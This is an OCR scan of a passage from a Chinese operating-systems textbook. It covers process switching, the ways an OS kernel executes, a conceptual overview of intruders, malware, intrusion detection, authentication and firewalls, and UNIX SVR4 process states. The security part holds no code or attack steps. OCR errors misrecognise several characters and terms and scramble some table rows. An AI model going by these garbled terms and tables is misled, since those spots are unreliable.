现在 的 问题 是 ,保存 的 上 下 文 环境 包括 什么 ? 答案 是 它 必 须 包 括 所 有 中 断 处 理 可 能 改变 的 信 
息 和 恢复 被 中 断 程序 时 所 需要 的 信息 。 因 此 ， 必 须 保 存 称 做 处 理 器 状态 信息 的 进程 控制 块 部 分 ， 
这 包括 程序 计数 器 、 其 他 处 理 器 寄存 器 和 栈 信息 。 

还 需要 做 些 其 他 工作 吗 ? 这 取决 于 下 一 步 会 发 生 什么 。 中 断 处 理 程序 通常 是 执行 一 些 与 中 断 
相关 的 基本 任务 的 小 程序 。 例如, 它 重 置 表示 出 现 中 断 的 标志 或 指示 器 。 可 能 给 产生 中 断 的 实体 
如 IO 模块 发 送 应 答 。 它 还 做 一 些 与 产生 中 断 的 事件 结果 相关 的 基本 辅助 工作 。 例 如 ， 如 果 中 断 
与 IO 事件 有 关 , 中 断 处 理 程序 将 检查 错误 条 件 ; 如 果 发 生 了 错误 , 中 断 处 理 程序 给 最 初 请 求 IO 
操作 的 进程 发 一 个 信和 号。 如果 是 时 钟 中 断 , 处 理 程序 将 控制 移交 给 分 派 器 ， 当 分 配给 当前 正在 运 
行进 程 的 时 间 片 用 尽 时 ， 分 派 器 将 控制 转移 给 另 一 个 进程 。 

进程 控制 块 中 的 其 他 信息 如 何 处 理 ? 如 果 中 断 之 后 是 切换 到 另 一 个 应 用 程序 , 则 需要 做 一 些 
工作 。 但是, 在 大 多 数 操作 系统 中 , 中 断 的 发 生 并 不 是 必须 伴随 着 进程 切换 的 。 可 能 是 中 其 处 理 
器 执行 之 后 ,当前 正在 运行 的 进程 继续 执行 。 在 这 种 情况 下 , 所 需要 做 的 是 当中 断 发 生 时 保存 处 
理 器 状态 信息 ， 当 控制 返回 给 这 个 程序 时 恢复 这 些 信 息 ， 在 典型 情况 下 , 保存 和 恢复 功能 由 硬件 
实现 。 
进程 状态 的 变化 

显然 , 模式 切换 与 进程 切换 是 不 同 的 2 。 发 生 模式 切换 可 以 不 改变 正 处 于 运行 态 的 进程 状态 ， 
在 这 种 情况 下 , 保存 上 下 文 环 境 和 以 后 恢复 上 下 文 环 境 只 需要 很 少 的 开销 。 但 是 , 如 果 当 前 正在 
运行 的 进程 被 转换 到 另 一 个 状态 ( 就 绪 、 阻 塞 等 ), 则 操作 系统 必须 使 其 环境 产生 实质 性 的 变化 ， 
完整 的 进程 切换 步骤 如 下 : 

1) 保存 处 理 器 上 下 文 环 境 ， 包 括 程序 计数 器 和 其 他 寄存 器 。 

2) 更 新 当前 处 于 运行 态 进 程 的 进程 控制 块 ， 包括 将 进程 的 状态 改变 到 另 一 状态 ( 就 绪 态 、 

阻塞 态 、 就 绪 / 挂 起 态 或 退出 态 )。 还 必须 更 新 其 他 相关 域 ， 包 插 离开 运行 态 的 原因 和 记 
账 信息 。 

3 ) 将 进程 的 进程 控制 块 移 到 相应 的 队列 〈 就 绪 、 在 事件 i 处 阻塞 、 就 绪 / 挂 起 )。 

4) 选择 另 一 个 进程 执行 ， 这 方面 的 内 容 将 在 本 书 的 第 四 部 分 探讨 。 

5) 更 新 所 选择 进程 的 进程 控制 块 ， 包 括 将 进程 的 状态 变 为 运行 态 。 

6) 更 新 内 存 管理 的 数据 结构 ， 这 取决 于 如 何 管理 地 址 转换 ， 这 方面 的 内 容 将 在 第 三 部 分 探 

讨 。 

7) 恢复 处 理 器 在 被 选择 的 进程 最 近 一 次 切换 出 运行 状态 时 的 上 下 文 环 境 ， 这 可 以 通过 载 人 

程序 计数 器 和 其 他 寄存 器 以 前 的 值 来 实现 。 

因此 ， 进 程 切 换 涉 及 状态 变化 ， 因 而 比 模式 切换 需要 做 更 多 的 工作 。 


3.5 ”操作 系统 的 执行 
第 2 章 给 出 了 关于 操作 系统 的 两 个 特殊 事实 : 
加 ”上下文 切 换 这 个 术语 经 常 出 现在 一 些 操作 系统 的 文献 和 课本 中 。 遗 二 的 是 ， 尽 管 大 部 分 文献 把 这 个 术语 当做 


进程 切换 来 使 用 ， 但 是 其 他 一 些 资 料 把 它 当 成 模式 切换 或 者 线程 切换 ， 线 程 切换 将 在 后 面 的 章节 讲述 。 为 了 
防止 产生 歧义 ， 本 书 中 不 使 用 这 个 术语 。 
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© 操作 系统 与 普通 的 计算 机 软件 以 同样 的 方式 运行 ， 也 就 是 说 ， 它 也 是 由 处 理 器 执行 的 一 
个 程序 。 
© 操作 系统 经 常 释 放 控 制 权 ， 并且 依赖 于 处 理 器 恢复 控制 权 。 
如 果 操 作 系 统 仅仅 是 一 组 程序 , 并 且 像 其 他 程序 一 样 由 处 理 器 执行 , 那么 操作 系统 是 一 个 进 
Bh? 如 果 是 ， 如 何 控制 它 ? 这 些 有 趣 的 问题 列 出 了 大 量 的 设计 方法 ,图 3.15 给 出 了 在 当代 各 
种 操作 系统 中 使 用 的 各 种 方法 。 


3.5.1 无 进程 的 内 核 


在 许多 老 操作 系统 中 ， 非 常 传统 和 通用 的 一 种 方法 是 在 所 有 的 进程 之 外 执行 操作 系统 内 核 
( 见 图 3.15a )。 通 过 这 种 方法 ， 在 当前 正 运 行 的 进程 被 中 断 或 产生 一 个 系统 调用 时 ， 该 进程 的 模 
式 上 下 文 环 境 被 保存 起 来 ,控制 权 转 交 给 内 核 。 操 作 系统 有 自己 的 内 存 区 域 和 系统 栈 , .用 于 控制 
过 程 调用 和 返回 。 操作 系统 可 以 执行 任何 预期 的 功能 ,并 恢复 被 中 断 进 程 的 上 下 文 , 这 将 导致 被 
中 断 的 用 户 进程 重新 继续 执行 。 或 者 , 操作 系统 可 以 完成 保存 进程 环境 的 功能 , 并 继续 调度 和 分 
派 另 一 个 进程 ， 是 否 这 样 做 取决 于 中 断 的 原因 和 当前 的 情况 。 

无 论 哪 种 情况 , 其 关键 点 是 进程 的 概念 仅仅 适用 于 用 户 程序 , 操作 系统 代码 作为 一 个 在 特权 
模式 下 工作 的 独立 实体 被 执行 


35.2 ”在 用 户 进程 中 执行 


在 较 小 的 机 器 (PC 机 、 工 作 站 ) 的 操作 系统 中 ， 常 见 的 方法 实际 上 是 在 用 户 进程 的 上 下 文 
中 执行 几乎 所 有 操作 系统 软件 。 其 观点 是 操作 系统 从 根本 上 说 是 用 户 调用 的 一 组 例 程 , 在 用 户 进 
程 环境 中 执行 ， 用 于 实现 各 种 功能 ， 如 图 3.15b 所 示 。 在 任何 时 刻 ， 操 作 系统 管理 着 n 个 进程 映 
像 ， 每 个 映像 不 仅 包括 图 3.13 中 列 出 的 区 域 ， 而 且 还 包括 内 核 程序 的 程序 、 数 据 和 栈 区 域 。 





a) 独立 内 核 b) 在 用 户 进 程 中 执行 的 操作 系统 函数 






| 
©) 作为 一 个 独立 进程 执行 的 操作 系统 函数 
图 3.15 ”操作 系统 和 用 户 进程 的 关系 


图 3.16 给 出 了 这 个 策略 下 的 一 个 典型 的 进程 映像 结构 。 当 进程 在 内 核 态 下 时 ， 独 立 的 内 核 
栈 用 于 管理 调用 /返回 。 操 作 系 统 代码 和 数据 位 于 共享 地 址 空间 中 ， 被 所 有 的 用 户 进程 共享 。 

- 当 发 生 一 个 中 断 、 陷 阱 或 系统 调用 时 ,处 理 器 被 置 于 内 核 态 ,控制 权 转 交 给 操作 系统 。 为 了 
将 控制 从 用 户 程 序 转交 给 操作 系统 , 需要 保存 模式 上 下 文 环境 并 进行 模式 切换 , 然后 切换 到 一 个 
操作 系统 例 程 ， A T S R 因此 , 不 需要 执行 进程 切换 , 仅 在 辣 
一 个 进程 中 进行 模式 切换 。 

如 果 操 作 系 统 完成 其 操作 后 ， 确定 需要 继续 运行 当前 进程 则 移行 -次 模式 区， 在 当前 进 
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程 中 恢复 被 中 断 的 程序 。 该 方法 的 重要 优点 之 一 是 ,一 个 用 户 程序 被 中 断 以 使 用 某 些 操作 系统 例 
程 , 然后 被 恢复 ,所 有 这 些 不 用 以 牺牲 两 次 进程 切换 为 代价 。 如 果 确 定 需要 发 生 进程 切换 而 不 是 
返回 到 先前 执行 的 程序 , 则 控制 权 被 转交 给 进程 切换 例 程 , 这 个 例 程 可 能 在 当前 进程 中 执行 , 也 
可 能 不 在 当前 进程 中 执行 , 这 取决 于 系统 的 设计 。 在 某 些 特殊 的 情况 下 , 如 当前 进程 必须 置 于 非 
运行 态 ， 而 另 一 个 进程 将 指定 为 正在 运行 的 进程 。 为 方便 起 见 ， 
这 样 一 个 转换 过 程 在 逻辑 上 可 以 看 做 是 在 所 有 进程 之 外 的 环境 
中 被 执行 的 。 

在 某 种 程度 上 ,对 操作 系统 的 这 种 看 法 是 非常 值得 注意 的 。 
在 某 些 时 候 ， 一 个 进程 可 以 保存 它 的 状态 信息 ， 从 就 线 态 进程 
中 选择 另 一 个 进程 ， 并 把 控制 权 释 放 给 这 个 进程 。 之 所 以 说 这 
是 一 种 混杂 的 情况 ， 是 因为 在 关键 时 候 ， 在 用 户 进程 中 执行 的 
代码 是 共享 的 操作 系统 代码 而 不 是 册 户 代码 。 基 于 用 户 态 和 内 
核 态 的 概念 ， 即 使 操作 系统 例 程 在 用 户 进 程 环境 中 执行 ， 用 户 
也 不 能 自 改 或 干涉 操作 系统 例 程 。 这 进一步 说 明 进 程 和 程序 的 


进程 控制 块 





概念 是 不 同 的 ， 它 们 之 间 不 是 一 对 一 的 关系 。 在 一 个 进程 中 ， { 共享 地 址 空间 | 
用 户 程序 和 操作 系统 程序 都 有 可 能 执行 ， 而 在 不 同 用 户 进程 中 图 3.16 进程 映像 :操作 系统 
执行 的 操作 系统 程序 是 相同 的 。 在 用 户 空间 中 执行 


3.5.3 基于 进程 的 操作 系统 


图 3.15: 中 显示 的 是 另 一 种 选择 ， 却 把 操作 系统 作为 一 组 系统 进程 来 实现 。 与 其 他 选择 一 样 ， 
作为 内 核 一 部 分 的 软件 在 内 核 态 下 执行 。 不 过 在 这 种 情况 下 , 主要 的 内 核 函 数 被 组 织 成 独立 的 进 
程 ， 同 样 ， 还 可 能 有 一 些 在 任何 进程 之 外 执行 的 进程 切换 代码 。 

这 种 方法 有 几 个 优点 。 它 利用 程序 设计 原理 , 促使 使 用 模块 化 操作 系统 ， 并且 模 块 间 具有 最 
小 的 、 简 明 的 接口 。 此 外 , 一些 非 关键 的 操作 系统 函数 可 简单 地 用 独立 的 进程 实现 , 例如 ,很 早 
就 曾经 提 到 过 的 用 于 记录 各 种 资源 ( 处 理 器 、 内 存 、 通 道 ) 的 使 用 程度 和 系统 中 用 户 进程 的 执行 
速度 的 监控 程序 。 由 于 这 个 程序 没有 为 任何 活动 进程 提供 特定 的 服务 ， 它 只 能 被 操作 系统 调用 。 
作为 一 个 进程 , 这 个 函数 可 以 在 指定 的 优先 级 上 运行 ， 并 且 在 分 派 器 的 控制 下 与 其 他 进程 交 蔡 执 
行 。 最 后 , 把 操作 系统 作为 一 组 进程 实现 , 在 多 处 理 器 或 多 机 环境 中 都 是 十 分 有 用 的 , 这 时 一 些 
操作 系统 服务 可 以 传送 到 专用 处 理 器 中 执行 ， 以 提高 性 能 。 


36 ”安全 问题 


操作 系统 对 于 每 个 进程 都 关联 了 一 套 权 限 。 这些 权限 规定 了 进程 可 以 获取 哪些 资源 , 包括 内 
存 区 域 、 文 件 和 特权 系统 指令 等 。 典型 的 是 ,一 个 进程 的 运行 代表 着 一 个 用 户 拥有 操作 系统 认证 
的 权限 。 在 配置 的 时 候 ， 一 个 系统 或 者 是 一 个 实用 进程 就 被 分 配 了 权限 。 

在 一 个 典型 的 系统 中 ， 最 高 级 别 的 权限 指 的 是 管理 员 、 超 级 用 户 或 根 用 户 的 访问 权限 © 。 根 
用 户 的 访问 权限 提供 了 对 一 个 操作 系统 所 有 的 功能 和 服务 的 访问 。 一 个 有 其 根 用 户 访问 权限 的 
进程 可 以 安全 地 控制 一 个 系统 ， 可 以 增加 或 者 改变 程序 和 文件 ， 对 其 他 进程 进行 监控 ， 发 送 和 
接收 网 络 流量 和 改变 权限 。 

设计 任何 操作 系统 的 一 个 关键 问题 是 阻止 或 者 至 少 是 探测 一 个 用 户 或 者 是 一 种 恶意 软件 
( 恶意 程序 ) 获得 系统 授权 的 权限 的 企图 ， 尤 其 是 从 根 用 户 获取 。 本 节 ， 我 们 将 简短 地 总 结 关 


-O 在 UNIX 系统 中 ,管理 员 或 超级 用 户 ， 这 种 账户 称 为 根 用 户 ; 因此 有 术语 根 用 户 访问 。 
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于 这 种 安全 问题 的 威胁 和 对 策 。 在 第 七 部 分 将 对 其 做 更 加 详细 的 阐述 。 


3.6.1 系统 访问 威胁 

系统 访问 威胁 分 为 两 大 类 : 入 侵 者 和 恶意 软件 。 
入 侵 者 

对 于 安全 ， 一 个 最 普通 的 威胁 就 是 人 侵 者 〈 另外 一 个 是 病毒 )， 通常 是 指 黑 客 和 人 解密 高 手 。 
在 旱 期 的 一 项 对 人 侵 的 重要 研究 中 ，Anderson [ANDE80] 定义 了 三 种 类 型 的 人 侵 者 : 

冒充 者 : 没有 授权 的 个 人 去 使 用 计算 机 和 通过 穿 透 系统 的 访问 控制 去 使 用 一 个 合法 用 户 的 
账号 。 

滥用 职权 者 : 一 个 合法 的 用 户 访问 没有 授权 的 数据 、 程 序 或 资源 , 或 者 用 户 具 有 这 种 访问 的 
授权 ,但 是 滥用 了 他 的 权限 。 

秘密 用 户 : 一 个 用 户 获得 了 系统 的 管理 控制 , 然后 使 用 这 种 控制 来 逃避 审计 和 访问 控制 , 或 
者 废止 审查 收集 。 

冒充 者 有 可 能 就 是 外 部 人 员 ; 滥用 职权 者 一 般 都 是 内 部 人 员 ; 秘密 用 户 可 能 是 外 部 人 员 也 可 
能 是 内 部 人 员 。 | 

入 侵 者 的 攻击 有 良性 的 也 有 严重 的 。 在 良性 阶段 ,许多 人 仪 仅 是 想 浏览 互联 网 并 想 知道 在 互联 
网 上 到 底 有 什么 。 在 严重 阶段 ， 这 些 人 尝试 着 去 读 权限 数据 ， 修 改 未 授权 的 数据 或 者 是 破坏 系统 。 

人 侵 者 的 目的 是 获得 一 个 系统 的 访问 权限 , 或 是 增加 一 个 系统 的 权限 获取 的 范围 。 最 初 许 多 
攻击 是 利用 了 系统 或 软件 的 漏洞 , 这 些 漏洞 可 以 让 用 户 执行 可 以 开启 系统 后 门 的 代码 。 当 程序 以 
一 定 的 权限 运行 ,人 侵 者 可 以 利用 如 缓冲 溢出 区 攻击 来 获得 系统 的 访问 。 将 在 7 章 介 绍 缓冲 区 洲 
出 攻击 。 

此 外 ， 入 侵 者 也 可 以 尝试 获取 那些 已 经 被 保护 的 信息 。 在 一 些 情 况 下 ,信息 就 是 在 表 框 里 面 
的 用 户 密 码 。 如 果 知 道 了 一 些 用 户 的 密码 , 那么 人 侵 者 可 以 登录 一 个 系统 , 然后 运行 合法 用 户 的 
所 有 权限 。 


恶意 软件 

计算 机 系统 最 为 复杂 的 威胁 可 能 就 是 利用 计算 机 系统 漏洞 的 程序 。 这 些 威胁 被 称 为 恶意 软 
F, 或 者 是 恶意 程序 。 在 这 一 部 分 , 我 们 将 关注 如 编辑 器 、 编 译 器 和 内 核 级 程序 等 应 用 程序 以 及 
通用 程序 的 威胁 。 

恶意 软件 分 为 两 大 类 : 一 种 需要 宿主 程序 ,一 种 则 是 独立 的 。 对 于 前 者 , 也 被 称 为 寄生 ， 其 
本 质 上 是 一 些 不 能 独立 于 实际 应 用 程序 、 通 用 程序 或 系统 程序 而 存在 的 片段 , 例如 病毒 、 逻 辑 炸 
弹 和 后 门 。 后 者 则 是 独立 并 可 以 被 操作 系统 调度 和 运行 的 程序 ， 例 如 蠕虫 和 僵尸 程序 。 

我 们 也 可 以 对 这 些 软 件 威胁 进行 以 下 的 区 分 : 一 种 不 能 进行 复制 , 而 另外 一 种 则 可 以 。 前 者 
是 通过 触发 器 激活 的 程序 或 者 程序 片段 , 例如 ， 逻辑 炸弹 、 后 门 和 伪 己 程序。 后 者 由 一 个 程序 片 
段 或 者 一 个 独立 的 程序 构成 ， 当 其 运行 后 , 可 能 产生 一 个 或 者 多 个 它 自己 的 副本 , 这 些 副 本 将 在 
同一 系统 或 其 他 系统 中 被 激活 ， 例 如 病毒 和 蠕虫 。 

比较 而 言 , 恶意 软件 可 能 是 无 害 的 , 或 者 表现 为 一 个 或 多 个 有 害 的 操作 , 这 些 有 害 的 操作 包 
括 毁 坏 内 存 里 的 文件 和 数据 ,通过 绕 开 控制 而 获得 权限 访问 和 为 人 侵 者 提供 一 种 绕 开 访问 控制 的 
方法 。 
3.6.2 ”对 抗 措 施 


入 侵 检 测 . 
RFC2828 ( 网 络 安全 术语 表 ) 对 人 侵 检测 的 定义 如 下 : 人 侵 检 测 是 一 种 安全 服务 ， 通 过 监控 
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和 分 析 系 统 事件 发 现 试 图 通过 未 经 授权 的 方法 访问 系统 资源 的 操作 ,并 对 这 种 操作 提供 实时 或 者 
准 实时 的 警告 。 
人 侵 检 测 系统 CDS) 可 以 分 为 如 下 几 类 : 
@ 基于 宿主 的 1DS: 对 于 可 疑 活 动 ， 监 控 单 个 宿主 的 特征 和 发 生 在 宿主 上 的 事件 。 
@ 基于 网 络 的 IDS: 监控 特定 的 网 络 段 或 者 设备 网 络 流量 ， 分 析 网 络 、 传 输 和 应 用 协议 来 
辨别 可 疑 活动 。 
IDS 由 三 个 部 分 组 成 : 
o 感应 器 : 感应 器 负责 收集 数据 。 感 应 器 的 输入 可 能 是 系统 的 任 一 部 分 ， 输 入 可 能 包含 了 
侵扰 的 证 据 。 典 型 的 感应 器 输入 包括 网 络 包 、 日 志文 件 和 系统 调用 记录 。 感 应 器 收集 这 
些 信息 ， 并 把 这 些 信息 发 送 给 分 析 器 。 
e 分 析 器 : 分 析 器 从 一 个 或 多 个 感应 器 或 者 其 他 分 析 器 接受 输入 数据 。 分 析 器 负责 确定 人 
侵 是 否 发 生 。 这 部 分 的 输出 表明 了 一 个 人 侵 已 经 发 生 。 输 出 可 能 包含 了 支持 入侵 发 生 的 
结论 的 证 据 。 分 析 器 可 能 提供 对 于 入 侵 结 果 采 取 何 种 操作 的 指导 。 
e APF: IDS 的 用 户 界面 可 以 让 用 户 查 看 系统 的 输出 和 控制 系统 的 行为 。 在 一 些 系 统 
中 ， 用 户 界面 可 以 等 同 于 负责 人 、 控 制 器 或 者 控制 台 部 分 。 
入 侵 检测 系统 用 来 侦 测 人 类 入 侵 者 行为 ， 以 及 恶意 软件 的 行为 。 
认证 
在 许多 计算 机 安全 内 容 中 , 用 户 认 证 是 一 个 主要 的 构建 模块 和 最 初 防线 。 用户 认证 是 许多 种 
访问 控制 和 用 户 责任 的 主要 部 分 。RFC2828 对 用 户 认 证 做 了 如 下 定义 : 





系统 实体 定义 了 验证 和 确认 的 过 程 。 认 证 过 程 包括 以 下 两 步 : 

. AUTR: 对 于 安全 系统 ， 提 出 了 标识 符 。( 应 小 心地 分 配 标识 符 ， 对 于 访问 控制 服务 
等 其 他 安全 服务 ， 认 证 定义 是 基本 部 分 。) 

。 验证 步骤 : 提出 或 产生 认证 信息 ， 用 来 证 实在 实体 与 标识 符 之 间 的 绑 定 。 


例如 ， 用 户 Alice Toklas 拥有 一 个 用 户 标 识 符 ABTOKLAS。 标 识 符 信 息 可 能 被 存储 在 Alice 
想 要 使 用 的 任意 一 台 服 务 器 或 者 计算 机 系统 中 ， 而 且 系 统管 理 员 和 其 他 用 户 可 能 知道 这 些 信息 。 
一 种 典型 的 与 用 户 ID 相关 联 的 认证 信息 项 就 是 密码 , 密码 是 用 于 保守 秘密 的 (秘密 仅仅 被 Alice 
和 系统 所 知 )。 如 果 没 有 人 得 到 或 猜 出 Alice 的 密码 ， 管 理 员 可 以 通过 Alice 的 用 户 ID 和 密码 的 
结合 建立 Alice 的 访问 许可 ， 并 审核 Alice 的 操作 。 由 于 Alice 的 ID 不 是 秘密 ， 系 统 用 户 可 以 给 
她 发 送 电 子 邮 件 ， 但 是 由 于 她 的 密码 是 保密 的 ， 所 以 没有 人 可 以 冒充 成 Alice。 
ZEE, 识别 是 这 样 一 种 方法 : 用 户 向 系统 提供 一 个 声明 的 身份 ; 用 户 认 证 就 是 确认 声明 的 
合法 性 的 方法 。 
一 共有 4 种 主要 的 认证 用 户 身 份 的 方法 ， 它 们 既 可 以 单独 使 用 ， 也 可 以 联合 使 用 : 
@ 个 人 知道 的 一 些 事物 : 例如 包括 密码 、 个 人 身份 号 码 ( PIN ) 或 者 是 预先 安排 的 一 套 问 题 
的 答案 。 
@ 个 人 拥有 的 一 些 事 物 : 例如 包括 电子 通行 卡 、 智 能 卡 、 物 理 钥 匙 。 这 种 类 型 的 身份 验证 
称 为 令 牌 。 
@ 个 人 自身 的 事物 (静态 生物 识别 技术 ): 例如 包括 指纹 、 虹 膜 和 人 脸 的 识别 。 
@ 个 人 要 做 的 事物 (动态 生物 识别 技术 ): 例如 包括 语音 模式 、 笔迹 特征 和 输入 节奏 的 识别 。 
适当 的 实现 和 使 用 所 有 的 这 些 方法 , 可 以 提供 可 靠 的 用 户 认 证 。 但 是 每 个 方法 都 有 问题 , 使 
得 对 手 能 够 猜测 或 盗 取 密 码 。 类 似 地 , 用 户 能 够 伪造 或 姿 取 令 牌 。 用户 可 能 忘记 密码 或 丢失 令 牌 。 
MA, 对 于 管理 系统 上 的 密码 、 令 牌 信息 和 保护 系统 上 的 这 些 信 息 ， 还 存在 显著 的 管理 开销 。 对 
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于 生物 识别 技术 ， 也 有 各 种 各 样 的 问题 ， 包 括 误 报 和 假 香 定 、 用 户 接受 程度 、 费 用 和 便利 与 否 。 
访问 控制 
访问 控制 实现 了 一 种 安全 策略 : 指定 谁 或 何 物 ( 例如 进程 的 情况 ) 可 能 有 权 使 用 特定 的 系统 
资源 和 在 每 个 场景 下 被 允许 的 访问 类 型 。 
访问 控制 机 制 调节 了 用 户 (或 是 代表 用 户 执行 的 进程 ) 与 系统 资源 之 间 的 关系 ,系统 资源 包 
括 应 用 程序 、 操 作 系统 、 防 火 墙 、 路 由 器 、 文 件 和 数据 库 。 系 统 首 先 要 对 寻求 访问 的 用 户 进 行 认 
TE. HA, 认证 功能 完全 决定 了 用 户 是 否 被 允许 访问 系统 。 然后 访问 控制 功能 决定 了 是 否 人 允许 用 
户 的 特定 访问 要 求 。 安 全 管理 员 维 护 着 一 个 授权 数据 库 , 对 于 允许 用 户 对 何 种 资源 采用 什么 样 的 
访问 方式 , 授权 数据 库 做 了 详细 说 明 。 访问 控制 功能 参考 这 个 数据 库 来 决定 是 否 准 予 访 问 。 审核 
功能 监控 和 记录 了 用 户 对 于 系统 资源 的 访问 。 
防火 墙 
对 于 保护 本 地 系统 或 系统 网 络 免 于 基于 网 络 的 安全 威胁 , 防火 墙 是 一 种 有 效 的 手段 ,并且 防 
火 墙 同时 提供 了 经 过 广域网 和 互联 网 对 外 部 网 络 的 访问 。 传统 上 ,防火墙 是 一 种 专用 计算 机 ， 是 
计算 机 与 外 部 网 络 的 接口 ;防火 墙 内 部 建立 了 特殊 的 安全 预防 措施 用 以 保护 网 络 中 计算 机 上 的 敏 
感 文件 。 其 被 用 于 服务 外 部 网 络 , 尤其 是 互联 网 、 连 接 和 拨号 线路 。 使 用 硬件 或 软件 来 实现 , 并 
且 与 单一 的 工作 站 或 者 PC 连接 的 个 人 防火 墙 也 很 常见 。 
[BELL94] 列 举 了 如 下 防火 墙 的 设计 目标 : 
1) 从 内 部 到 外 部 的 通信 必须 通过 防火 墙 ， 反之 亦 然 。 通 过 对 除 经 过 防火 墙 之 外 本 地 网 络 的 
所 有 访问 都 进行 物理 阻塞 来 达到 目的 。 可 以 对 其 进行 各 种 各 样 的 配置 ， 将 在 本 章 的 后 面 
部 分 进行 阐述 。 
2 ) 仅仅 允许 本 地 安全 策略 定义 的 授权 通信 通过 。 使 用 的 不 同类 型 防火 墙 是 通过 不 同类 型 的 
安全 策略 实现 的 。 
3) 防火 墙 本 身 对 于 渗透 是 免疫 的 。 这 意味 着 在 一 个 安全 的 操作 系统 上 使 用 强 固 系 统 。 值 得 
信赖 的 计算 机 系统 适合 用 作 防 火 墙 ， 并且 在 管理 应 用 中 也 被 要 求 使 用 。 


3.7 UNIX SVR4 进程 管理 


UNIX 系统 V 使 用 了 一 种 简单 但 是 功能 强大 的 进程 机 制 , 且 对 用 户 可 见 。UNIX 采用 图 3.15b 中 
的 模型 , 其 中 大 部 分 操作 系统 在 用 户 进程 环境 中 执行 .UNIX 使 用 两 类 进程 , 即 系统 进程 和 用 户 进程 。 
系统 进程 在 内 核 态 下 运行 ， 执 行 操作 系统 代码 以 实现 管理 功能 和 内 部 处 理 ， 如 内 存 空间 的 分 配 和 进 
程 交换 ， 用户 进程 在 用 户 态 下 运行 以 执行 用 户 程序 和 实用 程序 ， 在 内 核 态 下 运行 以 执行 属于 内 核 的 
指令 。 当 产生 异常 (错误 ) 或 发 生 中 有 断 或 用 户 进 程 发 出 系统 调用 时 ， 用 户 进程 可 进入 内 核 态 。 


3.7.1 进程 状态 


UNIX 操作 系统 中 共有 9 种 进程 状态 ， 如 表 3.9 所 示 。 图 3.17 (基于 [BACH86 ] 中 的 图 ) 
是 相应 的 状态 转换 图 ， 它 与 图 3.9b 类 似 ， 有 两 个 UNIX 睡眠 状态 对 应 于 图 3.9b 中 的 两 个 阻塞 状 
aS, 其 区 别 可 简单 概括 如 下 : 
@ UNIX 采用 两 个 运行 态 表示 进程 在 用 户 态 下 执行 还 是 在 内 核 态 下 执行 。 
@ UNIX 区 分 内 存 中 就 绪 态 和 被 抢占 态 这 两 个 状态 。 从 本 质 上 看 ， 它 们 是 同一 个 状态 ， 如 
图 中 它们 之 间 的 虚线 所 示 ， 之 所 以 区 分 这 两 个 状态 是 为 了 强调 进入 被 抢占 状态 的 方式 。 
当 一 个 进程 正在 内 核 态 下 运行 时 (系统 调用 、 时 钟 中 断 或 VO 中 断 的 结果 )， 内 核 已 经 完 
成 了 其 任务 并 准备 把 控制 权 返 回 给 用 户 程序 时 ， 就 可 能 会 出 现 抢占 的 时 机 。 这 时 ， 内 核 
可 能 决定 抢占 当前 进程 , 支持 另 一 个 已 经 就 绪 并 具有 较 高 优先 级 的 进程 。 在 这 种 情况 下 ， 
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当前 进程 转换 到 被 抢占 态 ， 但 是 为 了 分 派 处 理 ， 处 于 被 抢占 态 的 进程 和 处 于 内 存 中 就 绪 
态 的 进程 构成 了 一 条 队列 。 





内 存 空间 不 足 
( 仅 在 交换 系统 中 》 


图 3.17 UNIX 进程 状态 转换 图 


只 有 当 进 程 准备 从 内 核 态 移 到 用 户 态 时 才 可 能 发 生 抢占 ,进程 在 内 核 态 下 运行 时 是 不 会 被 抢 
占 的 ， 这 使 得 UNIX 不 适用 于 实时 处 理 。 有 关 实 时 处 理 需 求 的 讨论 请 参见 第 10 章 。 

UNIX 中 有 两 个 独特 的 进程 。 进 程 0 是 一 个 特殊 的 进程 ， 是 在 系统 启动 时 创建 的 。 实 际 上 ， 
这 是 预定 义 的 一 个 数据 结构 ， 在 启动 时 刻 被 加 载 ， 是 交换 进程 。 此 外 ,进程 0 产生 进程 1， 称 做 
初始 进程 ， 进 程 1 是 系统 中 的 所 有 其 他 进程 的 祖先 。 当 新 的 交互 用 户 登录 到 系统 时 ， 由 进程 1 
为 该 用 户 创 建 一 个 用 户 进程 。 随 后 ,用户 进程 可 以 创建 子 进程 ， 从 而 构成 一 棵 分 支 树 ， 因 此 , 任 
何 应 用 程序 都 是 由 一 组 相关 进程 组 成 的 。 


表 3.9 UNIX 进程 状态 


进程 状态 说 阴 
用 户 运 行 在 用 户 态 下 执行 
内 核 运 行 在 内 核 态 下 执行 
就 绪 ， 并 驻 留 在 内 存 中 只 要 内 核 调 度 到 就 立即 准备 运行 
KEIR, HEESEN P 在 某 事件 发 生前 不 能 执行 ， 且 进程 在 内 存 中 (一 种 阻塞 态 ) 
Re, BER 进程 已 经 就 绪 ， 但 交换 程序 必须 把 它 换 人 和 人 内存， 内 核 才能 调度 它 去 执行 
有 睡眠， 被 交换 进程 正在 等 待 一 个 事件 ， 并 且 被 交换 到 外 存 中 (一 种 阻塞 态 ) 

进程 从 内 核 态 返回 到 用 户 态 ， 但 是 内 核 抢占 它 ， 并 做 了 进程 切换 ， 以 调度 另 一 个 

被 抢占 进程 
创建 进程 刚 被 创建 ， 还 没有 做 好 运行 的 准备 。 
EX 进程 不 再 存在 ,但 是 它 留 下 一 个 记录 ， 该 记录 可 由 其 父 进 程 收 集 
3.7.2 ”进程 描述 


UNIX 中 的 进程 是 一 组 相当 复杂 的 数据 结构 ， 它 给 操作 系统 提供 管理 进程 和 分 派 进程 所 需要 
的 所 有 信息 。 表 3.10 概括 了 进程 映像 中 的 元 素 ， 它 们 被 组 织 成 三 部 分 : 用 户 上 下 文 、 寄存 器 上 
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下 文 和 系统 级 上 下 文 。 
表 3.10 UNIX 进程 映像 

用 户 级 上 下 文 
进程 正文 程序 中 可 执行 的 机 器 指令 
进程 数据 由 这 个 进程 的 程序 可 访问 的 数据 
HPR 包含 参数 、 局 部 变量 和 在 用 户 态 下 运行 的 函数 指针 
共享 内 存 区 与 其 他 进程 共享 的 内 存 区 ， 用 于 进程 间 的 通信 

寄存 器 上 下 文 环境 
程序 计数 器 将 要 执行 的 下 一 条 指令 地 址 ， 该 地 址 是 内 核 中 或 用 户 内 存 空间 中 的 内 存 地 址 
处 理 器 状态 寄存 器 包含 在 抢占 时 的 硬件 状态 ， 其 内 容 和 格式 取决 于 硬件 
栈 指针 指向 内 核 栈 或 用 户 栈 的 栈 项 ， 取 决 于 当前 的 运行 模式 
通用 寄存 器 与 硬件 相关 

系统 级 上 下 文 环境 
进程 表 项 定义 了 进程 的 状态 ， 操 作 系统 总 是 可 以 取 到 这 个 信息 
